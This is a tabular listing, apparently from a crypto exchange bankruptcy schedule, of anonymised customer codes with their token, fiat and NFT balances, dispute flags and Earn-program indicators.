| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348054 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07348055 | | DOGE[23.20154607], USD[0.00] | | |
| 07348056 | | CUSDT[1], DOGE[2.41864005], USD[14.72] | Yes | |
| 07348057 | | USD[10.00] | | |
| 07348058 | | USD[10.00] | | |
| 07348059 | | CUSDT[1], DOGE[198.57489011], GRT[1.00498957], LTC[1.47026203], TRX[4], USD[0.00] | Yes | |
| 07348060 | | BTC[0], DOGE[209.85479868], ETH[0], SOL[0], USD[0.57] | Yes | |
| 07348061 | | USD[10.00] | | |
| 07348062 | | CUSDT[1], DOGE[2038.86056755], USD[0.00] | | |
| 07348063 | | CUSDT[1], DOGE[0.00000464], USD[0.07] | | |
| 07348064 | | CUSDT[2], DOGE[.61955663], USD[0.01] | | |
| 07348065 | | BRZ[4], BTC[.0085988], CUSDT[22], DOGE[1603.35212264], ETH[.13984335], ETHW[.13984335], EUR[0.76], LINK[1], LTC[1.19679364], SHIB[2185665.70556119], SOL[.94475345], SUSHI[2.80678123], TRX[4], UNI[.23883957], USD[0.37], USDT[1] | | |
| 07348066 | | BRZ[1], CUSDT[6], DOGE[2328.06412035], TRX[201.69742354], USD[0.79], USDT[1] | | |
| 07348068 | | USD[10.00] | | |
| 07348069 | | GRT[4.66802476], USD[0.00] | | |
| 07348070 | | BTC[.00054624], CUSDT[5.01660643], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07348071 | | USD[10.00] | | |
| 07348072 | | USD[10.00] | | |
| 07348073 | | USD[0.01], USDT[0] | Yes | |
| 07348074 | | USD[10.00] | | |
| 07348075 | | USD[10.00] | | |
| 07348077 | | BRZ[1], USD[0.01] | | |
| 07348078 | | USD[10.00] | | |
| 07348079 | | USD[10.00] | | |
| 07348080 | | CUSDT[2], DOGE[5248.28415483], SHIB[1353729.52484093], USD[7.54] | | |
| 07348081 | | USD[0.00] | | |
| 07348082 | | USD[10.00] | | |
| 07348083 | Contingent, Disputed | USD[35994.67], USDT[0] | | |
| 07348085 | | USD[10.00] | | |
| 07348086 | | BTC[.00143379], DOGE[2825.75313978], USD[0.00] | | |
| 07348087 | | USD[0.00] | | |
| 07348088 | | DOGE[0], USD[0.01] | | |
| 07348089 | | BAT[1], BRZ[5.03288474], CUSDT[8], DOGE[867.51619604], TRX[3], USD[0.65], USDT[2] | | |
| 07348091 | | USD[10.00] | | |
| 07348092 | | ETH[.00000006], ETHW[.00606206], SOL[.00003932], TRX[1], USD[0.00] | Yes | |
| 07348093 | | BTC[.00011105], DOGE[75.07388497], ETH[.00680513], ETHW[.00672299], LINK[.50139192], TRX[122.11389897], USD[0.00] | Yes | |
| 07348094 | | BRZ[1], CUSDT[2], DOGE[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07348095 | | CUSDT[2], DOGE[2.78934153], SHIB[96626.05909118], TRX[72.71646021], USD[0.40] | | |
| 07348096 | | USD[10.00] | | |
| 07348097 | | BAT[9.91945587], CUSDT[5], GRT[14.37434912], SOL[23.55350001], SUSHI[10.76909494], TRX[157.03340182], UNI[8.87023778], USD[0.00] | Yes | |
| 07348098 | | CUSDT[1], DOGE[.00009182], TRX[1], USD[0.04] | | |
| 07348099 | | DAI[10.88222881], LINK[1.38785336], MATIC[30.32685182], SHIB[861115.38359142], TRX[2], UNI[8.22624649], USD[0.01], USDT[0] | Yes | |
| 07348100 | | USD[10.00] | | |
| 07348101 | | USD[0.00], YFI[.00028496] | Yes | |
| 07348103 | | CUSDT[2], DOGE[22159.58292059], USD[0.00] | Yes | |
| 07348104 | | BTC[.00022479], CUSDT[1], DOGE[2.00597675], USD[0.00] | | |
| 07348105 | | USD[10.81] | Yes | |
| 07348106 | | USD[10.00] | | |
| 07348107 | | DOGE[1546.53206242], USD[0.00] | | |
| 07348108 | | USD[10.00] | | |
| 07348109 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07348110 | | USD[10.00] | | |
| 07348111 | | BTC[0], USD[0.00] | | |
| 07348112 | | CUSDT[1], DOGE[0], GRT[0], SUSHI[7.10206709], TRX[1], USD[2.00] | | |
| 07348113 | | USD[0.68] | | |
| 07348114 | | USD[10.00] | | |
| 07348115 | | BAT[.00001742], CUSDT[6], DOGE[0.00003946], TRX[.00067576], USD[0.00], USDT[0.87225873] | | |
| 07348116 | | DOGE[3], TRX[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348117 | | USD[10.00] | | |
| 07348119 | | DOGE[187.98363489], USD[0.00] | | |
| 07348120 | | USD[10.00] | | |
| 07348122 | | USD[10.00] | | |
| 07348123 | | USD[10.00] | | |
| 07348124 | | DOGE[1], USD[0.01] | | |
| 07348126 | | USD[10.00] | | |
| 07348127 | | CUSDT[1], USD[0.00] | | |
| 07348130 | | USD[10.00] | | |
| 07348131 | | CUSDT[1], DOGE[.00001019], USD[0.08] | | |
| 07348132 | | USD[10.00] | | |
| 07348133 | | USD[10.00] | | |
| 07348134 | | DOGE[1], TRX[424.92667064], USD[0.00] | Yes | |
| 07348136 | | USD[10.00] | | |
| 07348137 | | USD[10.00] | | |
| 07348138 | | USD[10.00] | | |
| 07348139 | | BTC[.00021473], CUSDT[3], DOGE[.13974929], ETH[.00106607], ETHW[.00105239], SHIB[1460413.88486697], USD[2.01] | Yes | |
| 07348140 | | CUSDT[3], DOGE[0], TRX[1], UNI[.25462229], USD[0.00], USDT[0.00016904] | Yes | |
| 07348141 | | BTC[0], ETH[0.02000000], ETHW[0], SOL[0], USD[0.36] | | |
| 07348142 | | BTC[.00017141], USD[0.00] | | |
| 07348143 | | BAT[6], BRZ[3], BTC[0], CUSDT[4], DOGE[3], SOL[1], SUSHI[0], USD[0.00], USDT[4] | | |
| 07348144 | | USD[0.00], USDT[0] | | |
| 07348145 | | BRZ[1], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07348146 | | USD[10.00] | | |
| 07348148 | | USD[10.00] | | |
| 07348149 | | SHIB[2], USD[153.61] | Yes | |
| 07348151 | | BRZ[1], CUSDT[9], TRX[1], USD[0.01] | | |
| 07348153 | | DOGE[0], ETH[0], USD[0.06] | | |
| 07348154 | | USD[10.00] | | |
| 07348155 | | DOGE[26.74640948], USD[0.00] | | |
| 07348156 | | USD[10.00] | | |
| 07348157 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07348158 | | USD[10.00] | | |
| 07348159 | | USD[10.00] | | |
| 07348160 | | USD[10.00] | | |
| 07348161 | | USD[10.00] | | |
| 07348162 | | CUSDT[1], DOGE[.47654916], USD[72.95] | Yes | |
| 07348163 | | DOGE[25.38060887], USD[0.00] | | |
| 07348164 | | BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07348165 | | USD[10.00] | | |
| 07348166 | | BRZ[1], BTC[.00184816], CUSDT[2.02146774], DOGE[488.70106749], ETH[.02655814], ETHW[.02622982], KSHIB[330.2922512], SHIB[5620498.17820201], SUSHI[5.42788283], TRX[1], USD[50.17] | Yes | |
| 07348167 | | USD[10.00] | | |
| 07348168 | | BTC[.00000188], DOGE[1], ETH[.0000097], ETHW[.0000097], USD[0.01] | | |
| 07348169 | | USD[10.00] | | |
| 07348170 | | USD[0.00] | | |
| 07348171 | | USD[10.00] | | |
| 07348172 | | USD[1.00], USDT[8.94877177] | | |
| 07348173 | | DOGE[1.00967033], USD[0.00] | | |
| 07348175 | | USD[10.00] | | |
| 07348176 | | TRX[167.11894624], USD[0.00] | | |
| 07348177 | | USD[0.00] | | |
| 07348178 | | USD[10.00] | | |
| 07348179 | | BAT[.69146305], CUSDT[5], DOGE[1.00007804], TRX[1], USD[0.00] | | |
| 07348180 | | USD[10.00] | | |
| 07348181 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[7.44954758], ETH[0], GRT[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07348182 | | TRX[1], USD[0.01] | | |
| 07348183 | | ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07348184 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348185 | | USD[10.00] | | |
| 07348186 | | USD[10.00] | | |
| 07348188 | | USD[10.00] | | |
| 07348189 | | USD[0.00] | | |
| 07348191 | | BRZ[1], CUSDT[8], DOGE[229.92858004], KSHIB[621.53641053], SHIB[2544621.31366255], TRX[1], USD[0.01], USDT[4.9730307] | | |
| 07348192 | | BRZ[1], CUSDT[20.74706087], KSHIB[67.15484094], USD[0.24] | | |
| 07348193 | | BTC[0], DOGE[0], ETH[0], SUSHI[0], UNI[0], USD[9.19] | | |
| 07348194 | | USD[0.00] | | |
| 07348195 | | SOL[356.88420721], TRX[1], USD[61045.01] | Yes | |
| 07348196 | | USD[10.00] | | |
| 07348197 | | USD[8.07] | Yes | |
| 07348198 | | DOGE[21.37816626], USD[0.03] | | |
| 07348199 | | USD[10.00] | | |
| 07348200 | | BAT[123.56107612], BCH[.05925069], BTC[.00144945], CUSDT[10], DOGE[15.14379792], ETH[.08756626], ETHW[.08654074], GRT[46.49014944], LINK[.22517332], LTC[.41482074], MKR[.07544612], SHIB[20342.74125305], SOL[2.27210731], SUSHI[.60681297], TRX[1], USD[0.12], USDT[5.49796832] | Yes | |
| 07348202 | | BTC[.00022579], USD[0.00] | Yes | |
| 07348203 | | BRZ[0], DOGE[0], SOL[0], UNI[0], USD[0.00], USDT[0] | | |
| 07348204 | | TRX[94.17124268], USD[0.00] | | |
| 07348205 | | USD[10.00] | | |
| 07348206 | Contingent, Disputed | USD[10.00] | | |
| 07348207 | | USD[10.00] | | |
| 07348209 | | BTC[.0004698], CUSDT[2], DOGE[257.14165168], ETH[0.00613878], LTC[0.14211743], SHIB[1225959.63676471], TRX[2], USD[6.87] | Yes | |
| 07348210 | | USD[0.00] | | |
| 07348211 | | BRZ[2], DOGE[2], GRT[1], NFT (361836899259239774/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #56)[1], NFT (387647435578611425/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #51)[1], SHIB[4], SOL[687.34704083], TRX[2], USD[0.00], USDT[1.00004309] | Yes | |
| 07348212 | | USD[10.00] | | |
| 07348213 | | USD[10.00] | | |
| 07348214 | | USD[10.00] | | |
| 07348215 | | USD[10.00] | | |
| 07348216 | | CUSDT[4], TRX[29.68233578], USD[167.28] | | |
| 07348217 | | USD[10.00] | | |
| 07348218 | | USD[0.00] | | |
| 07348219 | | DOGE[1], USD[0.01] | | |
| 07348220 | | TRX[2], USD[28.02] | | |
| 07348221 | | CUSDT[15], DOGE[15508.44530353], NFT (367035261409192422/Entrance Voucher #2693)[1], SHIB[1176343.35986062], TRX[2], USD[0.00] | Yes | |
| 07348222 | | USD[0.00] | | |
| 07348223 | | USD[10.00] | | |
| 07348224 | | USD[10.00] | | |
| 07348225 | | USD[11.04] | Yes | |
| 07348226 | | BTC[0], CAD[0.00], DOGE[0], TRX[0], USD[0.01] | | |
| 07348227 | | USD[10.00] | | |
| 07348229 | | AUD[0.00], USD[0.00] | | |
| 07348230 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01] | | |
| 07348232 | | DOGE[ 192], USD[2.97] | | |
| 07348233 | | DOGE[1], USD[26.87] | | |
| 07348234 | | USD[10.00] | | |
| 07348235 | | DOGE[2619.33639834], TRX[1], USD[0.00], USDT[1.08212978] | Yes | |
| 07348237 | | USD[10.00] | | |
| 07348239 | | DOGE[2.80723116], USD[0.14] | | |
| 07348240 | | BTC[.0010956], ETH[.00055117], ETHW[.00055117], USD[0.82] | | |
| 07348241 | | CUSDT[1], DOGE[180.95265112], TRX[1], USD[0.00] | | |
| 07348242 | | USD[10.00] | | |
| 07348243 | | USD[10.00] | | |
| 07348244 | | USD[10.00] | | |
| 07348245 | | USD[0.00] | Yes | |
| 07348246 | | USD[10.00] | | |
| 07348247 | | DOGE[619.85551374], SHIB[3013805.42715749], USD[0.00] | Yes | |
| 07348251 | | USD[10.00] | | |
| 07348252 | | USD[10.00] | | |
| 07348254 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348255 | | CUSDT[3], USD[88.43] | | |
| 07348256 | | DOGE[3450.44391514], USD[10.00] | | |
| 07348257 | | USD[10.00] | | |
| 07348258 | | USD[10.00] | | |
| 07348259 | | USD[0.00] | | |
| 07348260 | | BRZ[3], CUSDT[13], DOGE[256.20416947], ETH[0], SHIB[1], TRX[859.72926364], UNI[16.96480574], USD[0.00], USDT[1.08786677] | Yes | |
| 07348261 | | BTC[.00003165], DOGE[100.8466602], EUR[0.00], USD[0.00] | | |
| 07348262 | | CUSDT[1], DOGE[8084.72573945], USD[110.00] | | |
| 07348263 | | USD[10.00] | | |
| 07348264 | | USD[10.00] | | |
| 07348265 | | PAXG[.00358353], TRX[1], USD[0.00] | Yes | |
| 07348266 | | CUSDT[2], DOGE[1], USD[0.01], USDT[0.00014570], YFI[.00000001] | Yes | |
| 07348267 | | CUSDT[7], TRX[2], USD[0.00] | | |
| 07348268 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07348269 | | USD[10.00] | | |
| 07348270 | | CUSDT[1], TRX[177.92951606], USD[0.00] | | |
| 07348271 | | USD[10.00] | | |
| 07348272 | | BAT[147.67423768], BRZ[1], CUSDT[9], DOGE[5561.82346691], GRT[141.46904382], MATIC[129.10901282], SHIB[6563572.69346369], SOL[2.21541253], SUSHI[16.22127764], TRX[3], USD[328.13] | Yes | |
| 07348273 | | USD[10.00] | | |
| 07348274 | | BRZ[3], CUSDT[2], DOGE[2.81781956], TRX[5], USD[0.99], USDT[0] | | |
| 07348275 | | BCH[.33355584], BTC[.00140833], CUSDT[3], DOGE[3818.12703621], ETH[.03337941], ETHW[.03296901], TRX[1234.62216898], USD[0.00], YFI[.00514206] | Yes | |
| 07348276 | | ETH[0], ETHW[0], USD[0.01] | Yes | |
| 07348277 | | DOGE[33.69716158], USD[0.00] | | |
| 07348278 | | BTC[.00264038], CUSDT[2], DOGE[1214.11085708], TRX[1], USD[0.00] | | |
| 07348279 | Contingent, Disputed | LINK[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07348280 | | CUSDT[1], DOGE[75.14983729], USD[0.06] | | |
| 07348281 | | USD[10.00] | | |
| 07348282 | | DOGE[297.93600358], SHIB[1], USD[0.00] | Yes | |
| 07348283 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07348285 | | USD[0.01] | Yes | |
| 07348287 | | USD[10.00] | | |
| 07348288 | | CUSDT[1], DOGE[3239.89177783], TRX[70.59550349], USD[0.00] | Yes | |
| 07348291 | | BTC[0], DOGE[0], ETH[0], LINK[0], SHIB[5], SOL[0], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07348292 | | USD[10.00] | | |
| 07348294 | | CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07348295 | | BAT[0], BRZ[0], CUSDT[68.15210103], DAI[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07348298 | | DOGE[2], SHIB[1673.19603939], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07348299 | | BAT[1.0106776], BRZ[2], DOGE[193717.8511573], ETH[18.13158204], ETHW[18.12635671], GRT[2.03550014], LINK[2.14352879], SUSHI[1.07139869], TRX[2], UNI[1.07176334], USD[42703.30], USDT[1.07164455] | Yes | |
| 07348301 | | AAVE[.02884143], BAT[11.76078479], CUSDT[5], DOGE[44.59628022], LINK[0], MATIC[7.17152007], SUSHI[0], TRX[1], USD[0.08] | Yes | |
| 07348302 | | USD[10.00] | | |
| 07348303 | | USD[10.00] | | |
| 07348304 | | USD[10.00] | | |
| 07348305 | | USD[10.00] | | |
| 07348306 | | USD[10.00] | | |
| 07348307 | | BTC[.00157717], CUSDT[1], DOGE[1978.63430417], ETH[.04100255], ETHW[.0404960 2], TRX[1], USD[261.67] | Yes | |
| 07348308 | | USD[10.00] | | |
| 07348309 | | BAT[0], DAI[0], DOGE[0], ETH[0], USD[0.02] | Yes | |
| 07348310 | | USD[0.00] | Yes | |
| 07348311 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07348312 | | USD[10.00] | | |
| 07348313 | | BRZ[1], DOGE[10665.05587536], GRT[1], USD[0.38] | | |
| 07348314 | | CUSDT[1], DOGE[.19546141], USD[0.01] | | |
| 07348316 | | USD[10.00] | | |
| 07348317 | | USD[10.00] | | |
| 07348318 | | UNI[.44525923], USD[0.00] | | |
| 07348319 | | USD[10.00] | | |
| 07348320 | | TRX[0], USD[0.00] | | |
| 07348321 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348322 | | BAT[.00055632], BRZ[0], BTC[0], CUSDT[6], DOGE[3], ETH[0.04979646], ETHW[0.04918086], GRT[0], SOL[.50102444], SUSHI[12.74458055], TRX[0], UNI[5.01616671], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07348323 | | BRZ[0], BTC[0], CUSDT[1], DOGE[3], LTC[0], SOL[0], TRX[1], USD[0.00] | | |
| 07348325 | | USD[0.01] | | |
| 07348326 | | DOGE[20318.42258348], USD[0.00], USDT[0] | Yes | |
| 07348327 | | USD[10.00] | | |
| 07348328 | | ETH[1.06873453], ETHW[1.06828557], USD[10.72] | Yes | |
| 07348330 | | USD[10.00] | | |
| 07348332 | | USD[10.00] | | |
| 07348333 | | BRZ[0], BTC[0], DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07348334 | | CUSDT[1], DOGE[0], TRX[1], USD[11.03] | | |
| 07348336 | | CUSDT[3], DOGE[68.48802077], TRX[1], USD[0.00], USDT[0.00000002] | Yes | |
| 07348337 | | USD[10.00] | | |
| 07348338 | | CUSDT[1], DOGE[17.26699993], GBP[0.00], USD[0.00] | Yes | |
| 07348339 | | CUSDT[1], DOGE[.5388069], USD[0.88] | | |
| 07348340 | | USD[10.00] | | |
| 07348341 | | BRZ[2], CUSDT[7], DOGE[2], GRT[1.00194713], TRX[8324.05106663], USD[18.51] | Yes | |
| 07348342 | | USD[10.00] | | |
| 07348343 | | BRZ[1], CUSDT[4], TRX[7], USD[0.12] | | |
| 07348344 | | DOGE[1], USD[33.82] | | |
| 07348345 | | CUSDT[6], ETH[0.01239148], ETHW[0.01239148], SHIB[1], USD[0.07] | | |
| 07348346 | | USD[10.00] | | |
| 07348348 | | BTC[0], DOGE[10.909] | | |
| 07348349 | | USD[10.00] | | |
| 07348350 | | USD[10.00] | | |
| 07348351 | | USD[10.00] | | |
| 07348352 | | DOGE[0], USD[0.01] | | |
| 07348353 | | CUSDT[7], DOGE[2283.77715758], TRX[3], USD[0.00] | Yes | |
| 07348354 | | USD[10.00] | | |
| 07348355 | | CUSDT[1], USD[43.06] | | |
| 07348358 | | BRZ[0], DOGE[150.77093802], USD[10.00] | | |
| 07348359 | | BRZ[0], ETH[0], SUSHI[0], USD[0.00], USDT[0.00000001] | | |
| 07348360 | | USD[10.00] | | |
| 07348361 | | SUSHI[.68206108], TRX[1], USD[0.00] | Yes | |
| 07348362 | | BTC[.00016721], USD[0.00] | | |
| 07348364 | | SUSHI[.60176694], USD[0.00] | | |
| 07348365 | | USD[0.05] | | |
| 07348367 | | USD[10.00] | | |
| 07348368 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07348369 | Contingent, Disputed | LINK[0], USD[0.04] | Yes | |
| 07348370 | | USD[11.04] | Yes | |
| 07348372 | | BF_POINT[200] | | |
| 07348373 | | USD[10.91] | Yes | |
| 07348374 | | USD[10.00] | | |
| 07348375 | | USD[10.00] | | |
| 07348376 | | USD[0.22] | | |
| 07348377 | | USD[10.00] | | |
| 07348379 | | USD[10.00] | | |
| 07348380 | | BRZ[1], CUSDT[2], DOGE[1], TRX[4], USD[0.01] | | |
| 07348381 | | USD[10.00] | | |
| 07348382 | | BAT[1.0165555], BRZ[1], CUSDT[19], DOGE[1], TRX[8], USD[0.01], USDT[1.11053257] | Yes | |
| 07348383 | | USD[10.00] | | |
| 07348384 | | USD[10.00] | | |
| 07348385 | | BRZ[1], BTC[.00015786], CUSDT[10], DOGE[1], TRX[2], USD[0.01], USDT[1.1085465] | Yes | |
| 07348387 | | SHIB[12505.1572868], USD[0.00], USDT[0] | | |
| 07348389 | | BAT[1], BRZ[1], BTC[.06027089], CUSDT[4], DOGE[1030.72406085], ETH[.3375108], ETHW[.33736296], GRT[560.22205124], SHIB[3113288.34181293], SOL[2.74727944], SUSHI[80.09315268], TRX[6442.28901802], UNI[1117.6975958], USD[10.32], USDT[1.45050814] | Yes | |
| 07348390 | | BTC[0], USD[0.03], USDT[0] | | |
| 07348391 | | BRZ[1], CUSDT[5], SHIB[315786.79485579], TRX[3], USD[0.00] | Yes | |
| 07348392 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348393 | | DOGE[1067.47934549], USD[10.00] | | |
| 07348394 | | DOGE[48.43292134], USD[0.00] | | |
| 07348395 | | USD[10.00] | | |
| 07348396 | | USD[10.00] | | |
| 07348397 | | USD[10.00] | | |
| 07348398 | | CUSDT[2], DOGE[1.00067449], USD[0.50] | | |
| 07348399 | | USD[10.00] | | |
| 07348400 | | BRZ[1], CUSDT[2], DOGE[2977.55447617], TRX[5093.85303765], USD[0.66] | | |
| 07348401 | | USD[10.00] | | |
| 07348402 | | USD[0.00] | Yes | |
| 07348403 | | DOGE[683.82500741], USD[0.00] | | |
| 07348404 | | USD[10.00] | | |
| 07348405 | | BRZ[1], CUSDT[2], DOGE[1.03746261], TRX[4], USD[0.01] | | |
| 07348406 | | DOGE[43.40052074], USD[0.00] | | |
| 07348407 | | USD[0.11] | | |
| 07348408 | | | | |
| 07348409 | | AAVE[1.19737967], BRZ[4], DOGE[13.0409042], ETHW[.03196406], SHIB[61], TRX[14], USD[0.00], USDT[0] | Yes | |
| 07348410 | | USDT[0] | | |
| 07348411 | | BAT[.00078], DOGE[.00086578], GRT[.00000116], TRX[.00001236], USD[0.00] | | |
| 07348412 | | SHIB[2], SOL[0], USD[0.16] | | |
| 07348413 | | BTC[0], DOGE[1], USD[10.00] | | |
| 07348414 | | USD[10.00] | | |
| 07348415 | | USD[10.00] | | |
| 07348416 | | USD[10.00] | | |
| 07348417 | | TRX[1], USD[0.01] | | |
| 07348418 | | USD[10.00] | | |
| 07348419 | | USD[10.00] | | |
| 07348420 | | DOGE[26.10261968], USD[0.00] | | |
| 07348421 | | BRZ[1], CUSDT[14], DOGE[1], GRT[1.9314854], TRX[9.00087675], USD[0.00], USDT[0.36575574] | Yes | |
| 07348422 | | DOGE[4885.051956], ETH[.8665255], ETHW[.8665255], GRT[1], TRX[8311.38947104], USD[1900.68] | | |
| 07348423 | | CUSDT[2], DOGE[1], USD[4.09] | Yes | |
| 07348424 | | USD[10.00] | | |
| 07348427 | | CUSDT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07348428 | | USD[10.00] | | |
| 07348429 | | USD[10.00] | | |
| 07348431 | | USD[0.04] | | |
| 07348432 | | BRZ[0], CUSDT[1], ETH[0], ETHW[0], GRT[0], USD[0.00] | Yes | |
| 07348433 | | USD[0.90], USDT[0] | Yes | |
| 07348434 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07348435 | | BTC[.00000004], DOGE[.46069322], TRX[1], USD[0.82] | Yes | |
| 07348436 | | LINK[0], USD[0.00], USDT[0] | Yes | |
| 07348437 | | CUSDT[3], TRX[2.00036399], USD[0.00] | | |
| 07348438 | | BRZ[1], BTC[0], CUSDT[12], DOGE[1], SOL[0], TRX[1], USD[0.00] | | |
| 07348439 | | USD[10.00] | | |
| 07348440 | | CUSDT[1], USD[0.00] | Yes | |
| 07348441 | | USD[10.00] | | |
| 07348443 | Contingent, Disputed | SHIB[0], TRX[0], USD[0.00] | Yes | |
| 07348444 | | USD[10.00] | | |
| 07348446 | | USD[10.00] | | |
| 07348447 | | CUSDT[3], DOGE[1], USD[0.00] | Yes | |
| 07348450 | | USD[10.00] | | |
| 07348451 | | BRZ[4], BTC[0], CUSDT[15], DOGE[23158.48626916], GRT[3.1940439], TRX[3], USD[-15.00] | Yes | |
| 07348452 | | USD[10.00] | | |
| 07348453 | | BAT[4], BRZ[1], CUSDT[5], DOGE[2549.85915366], GRT[1], TRX[5], USD[0.00] | | |
| 07348454 | | USD[10.00] | | |
| 07348456 | | USD[0.00] | | |
| 07348457 | | USD[10.00] | | |
| 07348458 | | CUSDT[1], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348460 | | DOGE[1], USD[0.00] | | |
| 07348461 | | DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07348462 | | DOGE[54.28436312], USD[0.00] | Yes | |
| 07348463 | | USD[10.00] | | |
| 07348465 | | USD[10.00] | | |
| 07348466 | | USD[10.00] | | |
| 07348467 | | BAT[38.50989689], BRZ[55.50789266], CUSDT[1], DAI[9.86175729], DOGE[3148.57940323], GRT[13.60527187], TRX[315.28791911], USD[0.77], USDT[9.90413745] | | |
| 07348468 | | ETH[.0000002], ETHW[.02201068], SHIB[1], TRX[1], USD[29.20], USDT[0] | Yes | |
| 07348469 | | BTC[.0000955], CUSDT[1], DOGE[899.31044001], TRX[1], USD[0.00] | Yes | |
| 07348470 | | USD[10.00] | | |
| 07348471 | | USD[10.00] | | |
| 07348472 | | USD[10.00] | | |
| 07348473 | | USD[10.00] | | |
| 07348474 | | USD[10.00] | | |
| 07348475 | | BTC[.00020149], USD[0.00] | | |
| 07348478 | | ETHW[.27053208], USD[1305.29] | | |
| 07348480 | | BTC[1.45235107], CUSDT[1], DOGE[8.31715048], ETH[2.58323644], ETHW[2.58243674], LINK[52.645526], MATIC[380.77845267], SOL[2.22744165], SUSHI[151.26399521], UNI[32.4576518], USD[4.04] | Yes | |
| 07348481 | | USD[10.00] | | |
| 07348482 | | USD[10.00] | | |
| 07348483 | | BAT[0], DOGE[1], GRT[0], TRX[0], USD[0.00] | | |
| 07348484 | | BRZ[1], CUSDT[7], USD[129.01] | Yes | |
| 07348485 | | USD[10.00] | | |
| 07348486 | | USD[10.00] | | |
| 07348487 | | USD[10.00] | | |
| 07348488 | | USD[10.00] | | |
| 07348489 | | BRZ[1], CUSDT[1], DOGE[1], ETH[0], GRT[2], USD[0.00] | | |
| 07348490 | | USD[10.00] | | |
| 07348491 | | DOGE[1], USD[0.00] | Yes | |
| 07348492 | | USD[10.00] | | |
| 07348493 | | USD[10.00] | | |
| 07348494 | | BTC[.00002945], DAI[2.14233839], DOGE[147.97799136], ETH[.00085956], ETHW[.00084596], PAXG[.0029785], TRX[14.9651422], USD[0.06] | Yes | |
| 07348495 | | BTC[.00017798], CUSDT[4], DOGE[2496.02790416], MATIC[15.31562376], TRX[92.07579686], USD[10.00] | | |
| 07348496 | | CUSDT[1], GRT[239.39934422], USD[0.00] | | |
| 07348497 | | USD[10.00] | | |
| 07348498 | | BRZ[11.11934313], BTC[.0004015], CAD[1.24], DOGE[9.31606628], ETH[.00020201], ETHW[.00020201], EUR[0.62], USD[0.00] | | |
| 07348500 | | CUSDT[4], SHIB[1], TRX[6], USD[0.53] | | |
| 07348501 | | USD[10.00] | | |
| 07348502 | | DOGE[.04371003], GRT[1.78028879], USD[0.77] | | |
| 07348503 | | USD[10.00] | | |
| 07348504 | | BTC[0], CUSDT[3], DOGE[5.1326402], ETH[0], SUSHI[1.10629453], TRX[37.98854393], USD[0.00], USDT[0] | Yes | |
| 07348505 | | CUSDT[1], USD[0.00] | | |
| 07348508 | | BRZ[0], DOGE[0], USD[0.00] | | |
| 07348509 | | DOGE[137.28409501], USD[0.00] | | |
| 07348510 | | BRZ[0], BTC[0], DOGE[0], ETH[0], UNI[0], USD[0.00], USDT[0] | | |
| 07348512 | | USD[10.00] | | |
| 07348513 | | SHIB[6891.1734204], USD[0.00] | Yes | |
| 07348514 | | USD[10.00] | | |
| 07348517 | | USD[10.00] | | |
| 07348520 | | USD[10.00] | | |
| 07348521 | | USD[10.00] | | |
| 07348522 | | USD[10.00] | | |
| 07348523 | Contingent, Disputed | DOGE[0], GRT[0], SHIB[0], USD[0.00] | Yes | |
| 07348524 | | USD[10.00] | | |
| 07348525 | | DOGE[0] | | |
| 07348526 | | USD[145.00] | | |
| 07348527 | | USD[11.00] | Yes | |
| 07348528 | | USD[20.00] | | |
| 07348529 | | BAT[1.0165555], USD[0.00] | Yes | |

